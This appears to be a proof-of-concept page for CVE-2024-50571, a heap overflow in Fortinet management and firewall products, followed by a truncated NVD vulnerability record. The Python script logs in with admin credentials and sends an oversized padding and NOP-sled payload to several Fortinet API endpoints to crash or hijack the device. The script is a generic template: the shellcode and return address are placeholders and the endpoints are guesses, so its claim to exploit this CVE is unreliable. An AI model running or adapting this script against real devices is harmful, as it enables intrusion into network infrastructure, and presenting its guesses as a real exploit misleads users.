CVE-2024-50571

# CVE-2024-50571 - Fortinet Heap-based Buffer Overflow PoC # This is a conceptual PoC demonstrating the exploitation of the heap-based buffer overflow # vulnerability in Fortinet FortiAnalyzer/FortiManager/FortiOS/FortiProxy products. # # Note: Requires valid high-privilege credentials (PR:H) # The vulnerability is triggered by sending specially crafted requests that cause # heap buffer overflow in the target system's request processing logic. import requests import struct import sys TARGET_HOST = "https://target-fortinet-device" USERNAME = "admin" PASSWORD = "password" def authenticate(session, host, username, password): """Authenticate to the Fortinet device management interface""" login_url = f"{host}/logincheck" data = { "username": username, "secretkey": password } resp = session.post(login_url, data=data, verify=False) return "CSRF_TOKEN" in session.cookies.get_dict() or resp.status_code == 200 def trigger_overflow(session, host, endpoint, payload): """ Trigger heap-based buffer overflow by sending oversized payload to a vulnerable endpoint that processes user-supplied data without proper bounds checking. """ url = f"{host}{endpoint}" headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } # Send oversized data to trigger heap buffer overflow resp = session.post(url, data=payload, headers=headers, verify=False) return resp def build_overflow_payload(overflow_size=4096): """ Build a payload that causes heap buffer overflow. The overflow data is designed to overwrite adjacent heap structures and potentially redirect execution flow. """ # NOP sled + shellcode placeholder nop_sled = b"\x90" * 256 # Return address overwrite (example - actual address needs ASLR bypass) ret_addr = struct.pack("<I", 0x41414141) # Padding to overflow the heap buffer padding = b"A" * overflow_size payload = padding + nop_sled + ret_addr return payload def main(): session = requests.Session() print(f"[*] Targeting {TARGET_HOST}") # Step 1: Authenticate with high-privilege credentials print("[*] Authenticating...") if not authenticate(session, TARGET_HOST, USERNAME, PASSWORD): print("[-] Authentication failed. High-privilege credentials required.") sys.exit(1) print("[+] Authentication successful") # Step 2: Build overflow payload print("[*] Building overflow payload...") payload = build_overflow_payload() # Step 3: Send crafted request to vulnerable endpoint # The exact endpoint varies by product (FortiAnalyzer/FortiManager/FortiOS/FortiProxy) vulnerable_endpoints = [ "/api/v2/monitor/system/config/backup", "/api/v2/cmdb/system/admin", "/jsonrpc" ] for endpoint in vulnerable_endpoints: print(f"[*] Attempting overflow via {endpoint}") try: resp = trigger_overflow(session, TARGET_HOST, endpoint, payload) print(f"[*] Response status: {resp.status_code}") except Exception as e: print(f"[*] Connection error (possible crash): {e}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2024-50571", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:35.673", "lastModified": "2026-01-27T20:16:13.320", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap-based buffer overflow vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.2, FortiAnalyzer 7.4.0 through 7.4.5, FortiAnalyzer 7.2.0 through 7.2.9, FortiAnalyzer 7.0.0 through 7.0.13, FortiAnalyzer 6.4 all versions, FortiAnalyzer 6.2 all versions, FortiAnalyzer 6.0 all versions, FortiAnalyzer Cloud 7.4.1 through 7.4.5, FortiAnalyzer Cloud 7.2.1 through 7.2.9, FortiAnalyzer Cloud 7.0.1 through 7.0.13, FortiAnalyzer Cloud 6.4 all versions, FortiManager 7.6.0 through 7.6.1, FortiManager 7.4.0 through 7.4.5, FortiManager 7.2.0 through 7.2.9, FortiManager 7.0.0 through 7.0.13, FortiManager 6.4 all versions, FortiManager 6.2 all versions, FortiManager 6.0 all versions, FortiManager Cloud 7.6.2, FortiManager Cloud 7.4.1 through 7.4.5, FortiManager Cloud 7.2.1 through 7.2.9, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4 all versions, FortiOS 7.6.0 through 7.6.2, FortiOS 7.4.0 through 7.4.6, FortiOS 7.2.0 through 7.2.10, FortiOS 7.0.0 through 7.0.16, FortiOS 6.4.0 through 6.4.15, FortiOS 6.2 all versions, FortiProxy 7.6.0 through 7.6.1, FortiProxy 7.4.0 through 7.4.7, FortiProxy 7.2.0 through 7.2.12, FortiProxy 7.0.0 through 7.0.19, FortiProxy 2.0 all versions, FortiProxy 1.2 all versions, FortiProxy 1.1 all versions, FortiProxy 1.0 all versions allows attacker to execute unauthorized code or commands via specifically crafted requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.14", "matchCriteriaId": "7326FF2C-9D53-4B37-A0F2-E8481791A74B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.10", "matchCriteriaId": "FA6919F1-34FA-40E4-9B09-D4DEE1936EE1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "A3705002-6335-464A-9E40-30E7C82081C8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "0518183A-9EE6-4C66-9ADB-CBA9B206D818"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.1", "versionEndExcluding": "7.0.14", "matchCriteriaId": "BA273D74-5412-413B-BA36-CC20399D2C5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.1", "versionEndExcluding": "7.2.10", "matchCriteriaId": "BF546373-6C4B-4356-B21F-FF78DE87EC9B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.1", "versionEndExcluding": "7.4.6", "matchCriteriaId": "2532420B-97C8-497E-BA1F-7A0254FE4566"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "7.0.14", "matchCriteriaId": "D3AE191C-9710-4484-A3D9-4807E4154818"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.10", "matchCriteriaId": "E1A7E1FC-4049-47E8-9ACF-32B6C037B458"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "24796E3A-DDCB-4949-9080-5DCEEECF0B6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.2", "matchCriteriaId": "241A8930-4ADA-4380-AA42-F10B28487595"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.1", "versionEndExcluding ... (truncated)